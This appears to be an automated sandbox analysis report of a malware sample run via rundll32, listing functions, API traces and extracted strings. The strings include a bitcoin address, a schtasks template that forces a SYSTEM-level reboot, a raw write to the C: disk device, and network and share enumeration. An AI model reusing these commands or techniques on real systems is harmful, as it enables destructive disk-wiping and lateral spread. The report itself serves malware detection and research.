                                                • Instruction Fuzzy Hash: FD318F71ED0224ABDF10DBA6EC48BAF7BB9EB44345F449811F906E6141D7709A908B60
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 02E5777B Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 86memorylibraryloaderCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 359 2e5777b-2e57794 LoadLibraryW 360 2e57864-2e57868 359->360 361 2e5779a-2e577ac GetProcAddress 359->361 362 2e57853 GetLastError 361->362 363 2e577b2-2e577d1 GetProcessHeap RtlAllocateHeap 361->363 364 2e57859-2e57863 FreeLibrary 362->364 363->364 365 2e577d7-2e577eb 363->365 364->360 367 2e57841-2e57851 GetProcessHeap RtlFreeHeap 365->367 368 2e577ed-2e577f4 365->368 367->364 368->367 369 2e577f6 368->369 370 2e577f9-2e577fd 369->370 371 2e57834-2e5783f 370->371 372 2e577ff-2e57831 wsprintfW call 2e56fc7 370->372 371->367 371->370 372->371
                                                APIs
                                                • LoadLibraryW.KERNEL32(iphlpapi.dll,00000000), ref: 02E57789
                                                • GetProcAddress.KERNEL32(00000000,GetExtendedTcpTable), ref: 02E577A2
                                                • GetProcessHeap.KERNEL32(00000008,00100000), ref: 02E577BD
                                                • RtlAllocateHeap.NTDLL(00000000), ref: 02E577C4
                                                • wsprintfW.USER32 ref: 02E5781B
                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02E57844
                                                • RtlFreeHeap.NTDLL(00000000), ref: 02E5784B
                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,02E57C7F), ref: 02E57853
                                                • FreeLibrary.KERNEL32(02CD6160), ref: 02E5785C
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.1670404172.0000000002E51000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E50000, based on PE: true
                                                • Associated: 00000001.00000002.1670391522.0000000002E50000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000001.00000002.1670422121.0000000002E5D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000001.00000002.1670439890.0000000002E66000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000001.00000002.1670439890.0000000002E6F000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000001.00000002.1670467256.0000000002E70000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_2e50000_rundll32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Heap$FreeLibraryProcess$AddressAllocateErrorLastLoadProcwsprintf
                                                • String ID: %u.%u.%u.%u$GetExtendedTcpTable$iphlpapi.dll
                                                • API String ID: 2876140663-442984071
                                                • Opcode ID: f9ec74d5259b51db7a4ca6345b395d991a13b2a289821513e1ade4253e14e8f7
                                                • Instruction ID: 3df502ddd45510a957cd788751ab90526442d87dd466623545cf00df70dddc7b
                                                • Opcode Fuzzy Hash: f9ec74d5259b51db7a4ca6345b395d991a13b2a289821513e1ade4253e14e8f7
                                                • Instruction Fuzzy Hash: 4F21A271DE0335BBDB209BA58C48B6EFBBDAF08305F445515F941E2140D77495A0CB60
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 02E514A9 Relevance: 19.8, APIs: 12, Strings: 1, Instructions: 312COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 375 2e514a9-2e5157a memset * 7 call 2e51038 378 2e51895-2e51899 375->378 379 2e51580-2e5158b call 2e5122d 375->379 381 2e51590-2e51597 379->381 381->378 382 2e5159d-2e515a0 381->382 383 2e515a2-2e515a7 382->383 384 2e515ac-2e515c1 call 2e51424 382->384 385 2e51890 383->385 384->378 388 2e515c7 384->388 385->378 389 2e515c9-2e515e6 388->389 389->389 390 2e515e8-2e51602 call 2e512d5 389->390 390->378 393 2e51608-2e51611 390->393 394 2e51613-2e51617 393->394 395 2e51620-2e51624 394->395 396 2e51619-2e5161c 394->396 395->394 398 2e51626-2e51629 395->398 396->395 397 2e5161e 396->397 397->395 399 2e5162d-2e51630 398->399 400 2e5162b 398->400 401 2e51632-2e51637 399->401 402 2e5163c-2e5164f 399->402 400->399 401->385 403 2e51651-2e5165f 402->403 403->403 404 2e51661-2e51694 memset call 2e51424 403->404 404->378 407 2e5169a-2e516af call 2e51424 404->407 407->378 410 2e516b5-2e516d5 memcpy 407->410 411 2e516d8-2e516dd 410->411 411->411 412 2e516df-2e516e3 411->412 413 2e516e5-2e516ec 412->413 414 2e5170c-2e51718 412->414 415 2e516f0-2e51704 memcpy 413->415 416 2e516ee 413->416 418 2e51721-2e5172f 414->418 419 2e5171a-2e5171f 414->419 415->414 416->415 420 2e51731-2e51738 418->420 419->420 420->378 421 2e5173e-2e5174f 420->421 423 2e51751-2e51756 421->423 424 2e51758-2e5176a memcpy 421->424 425 2e5176c-2e51773 423->425 424->425 425->378 426 2e51779-2e51795 425->426 428 2e51797-2e5179c 426->428 429 2e517a1-2e517d5 426->429 428->385 430 2e517d6-2e517e5 429->430 430->430 431 2e517e7-2e51806 memcpy 430->431 432 2e5182e 431->432 433 2e51808-2e5180c 431->433 434 2e51833-2e5183a 432->434 433->434 435 2e5180e-2e5181f call 2e51384 433->435 434->378 437 2e5183c-2e51859 call 2e51384 434->437 435->434 440 2e51821-2e5182a 435->440 437->378 443 2e5185b-2e51878 call 2e51384 437->443 440->435 442 2e5182c 440->442 442->434 443->378 446 2e5187a-2e5188b call 2e51384 443->446 446->385
                                                APIs
                                                • memset.MSVCRT ref: 02E514CB
                                                • memset.MSVCRT ref: 02E514E8
                                                • memset.MSVCRT ref: 02E51500
                                                • memset.MSVCRT ref: 02E51518
                                                • memset.MSVCRT ref: 02E51530
                                                • memset.MSVCRT ref: 02E51549
                                                • memset.MSVCRT ref: 02E5155C
                                                  • Part of subcall function 02E51038: memset.MSVCRT ref: 02E5105D
                                                  • Part of subcall function 02E51038: memset.MSVCRT ref: 02E51071
                                                  • Part of subcall function 02E51038: memset.MSVCRT ref: 02E510B9
                                                  • Part of subcall function 02E51038: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 02E510E3
                                                  • Part of subcall function 02E51038: GetLastError.KERNEL32(?,?,?,?,?,?,00000000,00000000,000001FF), ref: 02E510ED
                                                Strings
                                                • 1LeA4Raq3YNhk1XWRh3rJKk9xdNNoZDTkg, xrefs: 02E516BD
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.1670404172.0000000002E51000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E50000, based on PE: true
                                                • Associated: 00000001.00000002.1670391522.0000000002E50000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000001.00000002.1670422121.0000000002E5D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000001.00000002.1670439890.0000000002E66000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000001.00000002.1670439890.0000000002E6F000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000001.00000002.1670467256.0000000002E70000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_2e50000_rundll32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: memset$DirectoryErrorLastSystem
                                                • String ID: 1LeA4Raq3YNhk1XWRh3rJKk9xdNNoZDTkg
                                                • API String ID: 3928605736-2116829844
                                                • Opcode ID: df3bbd0a3e070fe9ca78e785d26dff583a42b7da36142aa480da05246fb45da0
                                                • Instruction ID: 5243d53e6b4f96e5620daec70ed5f74952915401e406dac14b41d6def3141897
                                                • Opcode Fuzzy Hash: df3bbd0a3e070fe9ca78e785d26dff583a42b7da36142aa480da05246fb45da0
                                                • Instruction Fuzzy Hash: EAB12871D902299BDB21CAA4DC44BDF77EC9B05344F14A4F6EE0CEB241E7788A848F51
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 02E5A0FE Relevance: 16.6, APIs: 11, Instructions: 142memorythreadCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 448 2e5a0fe-2e5a11c 449 2e5a125-2e5a14d GetProcessHeap HeapAlloc 448->449 450 2e5a11e-2e5a120 call 2e59f8e 448->450 452 2e5a153-2e5a166 GetProcessHeap HeapAlloc 449->452 453 2e5a26b-2e5a271 449->453 450->449 452->453 454 2e5a16c-2e5a17c call 2e56f40 452->454 454->453 457 2e5a182-2e5a188 454->457 458 2e5a198-2e5a19f 457->458 459 2e5a1c4 458->459 460 2e5a1a1-2e5a1b3 CreateThread 458->460 463 2e5a1c8 459->463 461 2e5a263-2e5a266 call 2e56f78 460->461 462 2e5a1b9-2e5a1c2 460->462 461->453 462->463 464 2e5a1ca-2e5a1ce 463->464 466 2e5a1d0-2e5a1d7 464->466 467 2e5a1d9-2e5a1ed WaitForMultipleObjects 464->467 466->464 466->467 467->461 468 2e5a1ef-2e5a1f4 467->468 469 2e5a1f6-2e5a1fc 468->469 470 2e5a211-2e5a217 468->470 471 2e5a1fe-2e5a203 469->471 472 2e5a219-2e5a228 CloseHandle 470->472 473 2e5a22b-2e5a238 GetProcessHeap HeapAlloc 470->473 474 2e5a205-2e5a208 471->474 475 2e5a20c-2e5a20f 471->475 472->473 473->461 476 2e5a23a-2e5a24d GetProcessHeap HeapAlloc 473->476 474->471 477 2e5a20a 474->477 475->473 476->461 478 2e5a24f-2e5a25d call 2e56f02 476->478 477->473 478->461 481 2e5a18a-2e5a196 478->481 481->458
                                                APIs
                                                • GetProcessHeap.KERNEL32(00000008,00000008), ref: 02E5A13E
                                                • HeapAlloc.KERNEL32(00000000), ref: 02E5A147
                                                • GetProcessHeap.KERNEL32(00000008,00000021), ref: 02E5A15C
                                                • HeapAlloc.KERNEL32(00000000), ref: 02E5A15F
                                                • CreateThread.KERNELBASE(00000000,00000000,Function_0000A073,00000000,00000000,00000000), ref: 02E5A1AB
                                                • WaitForMultipleObjects.KERNEL32(?,00000000,00000000,000000FF,00000000), ref: 02E5A1E4
                                                • CloseHandle.KERNEL32(00000000), ref: 02E5A222
                                                • GetProcessHeap.KERNEL32(00000008,00000008), ref: 02E5A22F
                                                • HeapAlloc.KERNEL32(00000000), ref: 02E5A232
                                                • GetProcessHeap.KERNEL32(00000008,00000021), ref: 02E5A23E
                                                • HeapAlloc.KERNEL32(00000000), ref: 02E5A241
                                                  • Part of subcall function 02E59F8E: GetCurrentThread.KERNEL32 ref: 02E59FA7
                                                  • Part of subcall function 02E59F8E: OpenThreadToken.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,02E5A125,00000000), ref: 02E59FAE
                                                  • Part of subcall function 02E59F8E: DuplicateTokenEx.ADVAPI32(00000000,02000000,00000000,00000002,00000002,02E5A125), ref: 02E59FC9
                                                  • Part of subcall function 02E59F8E: CloseHandle.KERNEL32(00000000,?,00000000,00000000,00000000,00000024,02E56EDA,00000000,0000FFFF), ref: 02E5A05B
                                                  • Part of subcall function 02E59F8E: CloseHandle.KERNEL32(02E5A125,?,00000000,00000000,00000000,00000024,02E56EDA,00000000,0000FFFF), ref: 02E5A068
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.1670404172.0000000002E51000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E50000, based on PE: true
                                                • Associated: 00000001.00000002.1670391522.0000000002E50000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000001.00000002.1670422121.0000000002E5D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000001.00000002.1670439890.0000000002E66000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000001.00000002.1670439890.0000000002E6F000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000001.00000002.1670467256.0000000002E70000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_2e50000_rundll32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Heap$AllocProcess$CloseHandleThread$Token$CreateCurrentDuplicateMultipleObjectsOpenWait
                                                • String ID:
                                                • API String ID: 3129177753-0
                                                • Opcode ID: 26c646f6e2d29e9cdbc67159a0670d1ec9c404aeaf9f2975c262a7104bb9acbe
                                                • Instruction ID: d4f327d1372bbb499318bb78b29c6e19dd15af3b45d7d4bc54e616134448cca4
                                                • Opcode Fuzzy Hash: 26c646f6e2d29e9cdbc67159a0670d1ec9c404aeaf9f2975c262a7104bb9acbe
                                                • Instruction Fuzzy Hash: E641C5B0DA1225AFDF149FA5DD85BAE7775FB48314F209A39E906E7380DB709940CB20
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 02E584DF Relevance: 15.8, APIs: 5, Strings: 4, Instructions: 82timeCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 482 2e584df-2e584ff GetLocalTime call 2e56973 485 2e58504-2e5853b GetSystemDirectoryW 482->485 486 2e58501-2e58503 482->486 487 2e58541-2e58555 PathAppendW 485->487 488 2e585c9-2e585cf 485->488 486->485 487->488 489 2e58557-2e5855e call 2e58494 487->489 492 2e58594-2e585af wsprintfW 489->492 493 2e58560-2e5856c 489->493 494 2e585b2-2e585c2 call 2e583bd 492->494 495 2e58573-2e58592 wsprintfW 493->495 496 2e5856e 493->496 498 2e585c7 494->498 495->494 496->495 498->488
                                                APIs
                                                • GetLocalTime.KERNEL32(?,00000000), ref: 02E584F1
                                                  • Part of subcall function 02E56973: GetTickCount.KERNEL32 ref: 02E56973
                                                • GetSystemDirectoryW.KERNEL32(?,0000030C), ref: 02E58533
                                                • PathAppendW.SHLWAPI(?,shutdown.exe /r /f), ref: 02E5854D
                                                • wsprintfW.USER32 ref: 02E58589
                                                • wsprintfW.USER32 ref: 02E585A9
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.1670404172.0000000002E51000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E50000, based on PE: true
                                                • Associated: 00000001.00000002.1670391522.0000000002E50000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000001.00000002.1670422121.0000000002E5D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000001.00000002.1670439890.0000000002E66000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000001.00000002.1670439890.0000000002E6F000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000001.00000002.1670467256.0000000002E70000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_2e50000_rundll32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: wsprintf$AppendCountDirectoryLocalPathSystemTickTime
                                                • String ID: /RU "SYSTEM" $at %02d:%02d %ws$schtasks %ws/Create /SC once /TN "" /TR "%ws" /ST %02d:%02d$shutdown.exe /r /f
                                                • API String ID: 3115031192-1217748824
                                                • Opcode ID: 51e7e002c7431d566404ab02e1899c8f8c28b4494a9df476013631bfebb8cef9
                                                • Instruction ID: 5ba12c1452acb1cdd3e24c8201577922b06c0b0010a3eda5e5caddd92a66a021
                                                • Opcode Fuzzy Hash: 51e7e002c7431d566404ab02e1899c8f8c28b4494a9df476013631bfebb8cef9
                                                • Instruction Fuzzy Hash: 41214C72BD12285BEB34D765EC09FEB73AEDB88264F049561F909D2080EA70C9D4CB60
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 02E583BD Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 81sleepprocessstringCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 499 2e583bd-2e58408 wsprintfW GetEnvironmentVariableW 500 2e58432-2e58435 499->500 501 2e5840a-2e5841a GetSystemDirectoryW 499->501 502 2e58438-2e5843c 500->502 503 2e5841c-2e58430 lstrcatW 501->503 504 2e5848b-2e58491 501->504 502->502 505 2e5843e-2e58443 502->505 503->500 503->504 506 2e58446-2e5844a 505->506 506->506 507 2e5844c-2e58479 CreateProcessW 506->507 507->504 508 2e5847b-2e58485 Sleep 507->508 508->504
                                                APIs
                                                • wsprintfW.USER32 ref: 02E583DC
                                                • GetEnvironmentVariableW.KERNEL32(ComSpec,?,0000030C), ref: 02E58400
                                                • GetSystemDirectoryW.KERNEL32(?,0000030C), ref: 02E58412
                                                • lstrcatW.KERNEL32(?,\cmd.exe), ref: 02E58428
                                                • CreateProcessW.KERNELBASE(?,?,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 02E5846F
                                                • Sleep.KERNELBASE(02E585C7), ref: 02E58485
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.1670404172.0000000002E51000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E50000, based on PE: true
                                                • Associated: 00000001.00000002.1670391522.0000000002E50000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000001.00000002.1670422121.0000000002E5D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000001.00000002.1670439890.0000000002E66000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000001.00000002.1670439890.0000000002E6F000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000001.00000002.1670467256.0000000002E70000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_2e50000_rundll32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CreateDirectoryEnvironmentProcessSleepSystemVariablelstrcatwsprintf
                                                • String ID: /c %ws$ComSpec$\cmd.exe
                                                • API String ID: 1518394870-1564754240
                                                • Opcode ID: 63e6f49046b2b333eb4b5010afb453d33d99118ed494af303ec85867f46030a2
                                                • Instruction ID: eb3bcdae7e992c389984085613b968837d7f6a940ade9644fb6bcaff2dd5b0ab
                                                • Opcode Fuzzy Hash: 63e6f49046b2b333eb4b5010afb453d33d99118ed494af303ec85867f46030a2
                                                • Instruction Fuzzy Hash: 3C21D7B2AC02286FE710DAE1DC84EFB77ACDB64255F008576F906E7140E6349A848B30
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 02E5786B Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 90memoryCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 827 2e5786b-2e5788e GetIpNetTable 828 2e57897-2e5789a 827->828 829 2e57890-2e57892 827->829 831 2e57951 828->831 832 2e578a0-2e578b9 GetProcessHeap HeapAlloc 828->832 830 2e57954-2e57957 829->830 831->830 833 2e57950 832->833 834 2e578bf-2e578c9 GetIpNetTable 832->834 833->831 835 2e57941-2e5794a GetProcessHeap HeapFree 834->835 836 2e578cb-2e578d7 834->836 835->833 836->835 837 2e578d9-2e578e0 836->837 838 2e578e3-2e578f0 837->838 839 2e578f7-2e578f9 838->839 840 2e578f2-2e578f4 838->840 841 2e5792d-2e5793b 839->841 842 2e578fb-2e57928 wsprintfW call 2e56fc7 839->842 840->839 841->838 844 2e5793d-2e5793f 841->844 842->841 844->835
                                                APIs
                                                • GetIpNetTable.IPHLPAPI(00000000,?,00000000), ref: 02E57887
                                                • GetProcessHeap.KERNEL32(00000000,?,00000000), ref: 02E578A5
                                                • HeapAlloc.KERNEL32(00000000), ref: 02E578AC
                                                • GetIpNetTable.IPHLPAPI(00000000,?,00000000), ref: 02E578C5
                                                • wsprintfW.USER32 ref: 02E57917
                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02E57943
                                                • HeapFree.KERNEL32(00000000), ref: 02E5794A
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.1670404172.0000000002E51000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E50000, based on PE: true
                                                • Associated: 00000001.00000002.1670391522.0000000002E50000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000001.00000002.1670422121.0000000002E5D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000001.00000002.1670439890.0000000002E66000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000001.00000002.1670439890.0000000002E6F000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000001.00000002.1670467256.0000000002E70000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_2e50000_rundll32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Heap$ProcessTable$AllocFreewsprintf
                                                • String ID: %u.%u.%u.%u
                                                • API String ID: 2259129056-1542503432
                                                • Opcode ID: 8f524277c965de87380477d176299f460be97e1192ae3e8064efd7c5621aad97
                                                • Instruction ID: 6ba64602f1cfa914d29a25061753ba888f1fd21da4b49f52d1f5cf0cbe2d88dc
                                                • Opcode Fuzzy Hash: 8f524277c965de87380477d176299f460be97e1192ae3e8064efd7c5621aad97
                                                • Instruction Fuzzy Hash: 93319EB2DA0279AFCB109FA5CC84ABEFBBCEF8D304B154456EA01E6141D7789654CB70
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 02E58D5A Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 68filememoryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • CreateFileA.KERNELBASE(\\.\C:,40000000,00000003,00000000,00000003,00000000,00000000,00000000), ref: 02E58D79
                                                • DeviceIoControl.KERNELBASE(00000000,00070000,00000000,00000000,?,00000018,?,00000000), ref: 02E58D9A
                                                • LocalAlloc.KERNEL32(00000000,?), ref: 02E58DAD
                                                • SetFilePointer.KERNELBASE(00000000,?,00000000,00000000), ref: 02E58DC0
                                                • WriteFile.KERNELBASE(00000000,00000000,?,?,00000000), ref: 02E58DD2
                                                • LocalFree.KERNEL32(00000000), ref: 02E58DD9
                                                • FindCloseChangeNotification.KERNELBASE(00000000), ref: 02E58DE0
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.1670404172.0000000002E51000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E50000, based on PE: true
                                                • Associated: 00000001.00000002.1670391522.0000000002E50000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000001.00000002.1670422121.0000000002E5D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000001.00000002.1670439890.0000000002E66000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000001.00000002.1670439890.0000000002E6F000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000001.00000002.1670467256.0000000002E70000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_2e50000_rundll32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: File$Local$AllocChangeCloseControlCreateDeviceFindFreeNotificationPointerWrite
                                                • String ID: \\.\C:
                                                • API String ID: 1700486895-259948872
                                                • Opcode ID: 8539a0e637bcb0db9fcb6065dc1b95577719987bcaff1f3645476d70a6b95612
                                                • Instruction ID: 5799c8ffb5fa905c79919c92f1d015bd4659368f382ff0c082693381b17a7046
                                                • Opcode Fuzzy Hash: 8539a0e637bcb0db9fcb6065dc1b95577719987bcaff1f3645476d70a6b95612
                                                • Instruction Fuzzy Hash: 7611A7715D13347FD221AA62AC8CFBB7E9CEF8B668F445518FD05D1040DB208590C7B2
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 02E57298 Relevance: 13.8, APIs: 11, Instructions: 95memoryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • EnterCriticalSection.KERNEL32(?,00000000,00000000,00000000,-00000002,?,02E56FFB,00000001,?,00000000), ref: 02E572B9
                                                  • Part of subcall function 02E571D6: EnterCriticalSection.KERNEL32(?,00000000,00000000,?,?,02E572CA,00000001,00000000,?,02E56FFB,00000001,?), ref: 02E571E7
                                                  • Part of subcall function 02E571D6: LeaveCriticalSection.KERNEL32(?,?,?,02E572CA,00000001,00000000,?,02E56FFB,00000001,?), ref: 02E5723E
                                                • GetProcessHeap.KERNEL32(00000008,00000008,00000001,00000000,?,02E56FFB,00000001,?,00000000), ref: 02E572EA
                                                • HeapAlloc.KERNEL32(00000000,?,02E56FFB,00000001,?,00000000), ref: 02E572F3
                                                • GetProcessHeap.KERNEL32(00000008,?,?,02E56FFB,00000001,?,00000000), ref: 02E5730B
                                                • HeapAlloc.KERNEL32(00000000,?,02E56FFB,00000001,?,00000000), ref: 02E5730E
                                                • memcpy.MSVCRT ref: 02E5733F
                                                • GetProcessHeap.KERNEL32(00000000,?,?,02E56FFB,00000001,?,00000000), ref: 02E57358
                                                • HeapFree.KERNEL32(00000000,?,02E56FFB,00000001,?,00000000), ref: 02E5735B
                                                • GetProcessHeap.KERNEL32(00000008,?,?,00000001,00000000,?,02E56FFB,00000001,?,00000000), ref: 02E57373
                                                • HeapReAlloc.KERNEL32(00000000,?,02E56FFB,00000001,?,00000000), ref: 02E5737A
                                                • LeaveCriticalSection.KERNEL32(?,00000001,00000000,?,02E56FFB,00000001,?,00000000), ref: 02E5739E
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.1670404172.0000000002E51000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E50000, based on PE: true
                                                • Associated: 00000001.00000002.1670391522.0000000002E50000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000001.00000002.1670422121.0000000002E5D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000001.00000002.1670439890.0000000002E66000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000001.00000002.1670439890.0000000002E6F000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000001.00000002.1670467256.0000000002E70000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_2e50000_rundll32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Heap$CriticalProcessSection$Alloc$EnterLeave$Freememcpy
                                                • String ID:
                                                • API String ID: 1369668251-0
                                                • Opcode ID: 8d14871464339fc84eb7cc8b7acc6fd36f6e645c10dd216debf1d726aa18ee1a
                                                • Instruction ID: bac68b9a3fc4be848e67b77ae0c368e18962f5cef351879605484edeb2a7468a
                                                • Opcode Fuzzy Hash: 8d14871464339fc84eb7cc8b7acc6fd36f6e645c10dd216debf1d726aa18ee1a
                                                • Instruction Fuzzy Hash: 7D315A71990724EFCB219FAAC944E6AB7F5FF4C314B108918ED8A87650DB31E961CF60
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 02E57A17 Relevance: 9.1, APIs: 6, Instructions: 103sharememoryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • WNetOpenEnumW.MPR(00000001,00000000,00000000,?,0000FFFF), ref: 02E57A3C
                                                • GlobalAlloc.KERNEL32(00000040,00004000,00000000,?,00000000,0000FFFF), ref: 02E57A50
                                                • memset.MSVCRT ref: 02E57A6B
                                                • WNetEnumResourceW.MPR(0000FFFF,000000FF,00000000,00004000), ref: 02E57A7F
                                                • GlobalFree.KERNEL32(00000000), ref: 02E57B18
                                                • WNetCloseEnum.MPR(0000FFFF), ref: 02E57B21
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.1670404172.0000000002E51000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E50000, based on PE: true
                                                • Associated: 00000001.00000002.1670391522.0000000002E50000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000001.00000002.1670422121.0000000002E5D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000001.00000002.1670439890.0000000002E66000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000001.00000002.1670439890.0000000002E6F000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000001.00000002.1670467256.0000000002E70000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_2e50000_rundll32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Enum$Global$AllocCloseFreeOpenResourcememset
                                                • String ID:
                                                • API String ID: 4070278229-0
                                                • Opcode ID: 301adfc2faf6131055354a0c91c6b86382832c3cb84267602cb636a59bc845ba
                                                • Instruction ID: 97f11700b9ca7ac3b5fe5cedd3b87482a9ea3778d87067ffda8ff33ee21ee64a
                                                • Opcode Fuzzy Hash: 301adfc2faf6131055354a0c91c6b86382832c3cb84267602cb636a59bc845ba
                                                • Instruction Fuzzy Hash: B4319C71850129AFDB209F95CC84EAEFBBAEF48308B50D169F915A7151E3309BA0CB60
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 02E58E04 Relevance: 9.1, APIs: 6, Instructions: 52memoryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • htonl.WS2_32 ref: 02E58E25
                                                • htonl.WS2_32 ref: 02E58E32
                                                • inet_ntoa.WS2_32(00000000), ref: 02E58E35
                                                  • Part of subcall function 02E56916: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,02E591A4,000000FF,00000000,00000000,00000000,00000000,74D65350,?,02E591A4,00000000), ref: 02E56935
                                                  • Part of subcall function 02E56916: GetProcessHeap.KERNEL32(00000000,00000000,?,02E591A4,00000000), ref: 02E56942
                                                  • Part of subcall function 02E56916: HeapAlloc.KERNEL32(00000000,?,02E591A4,00000000), ref: 02E56949
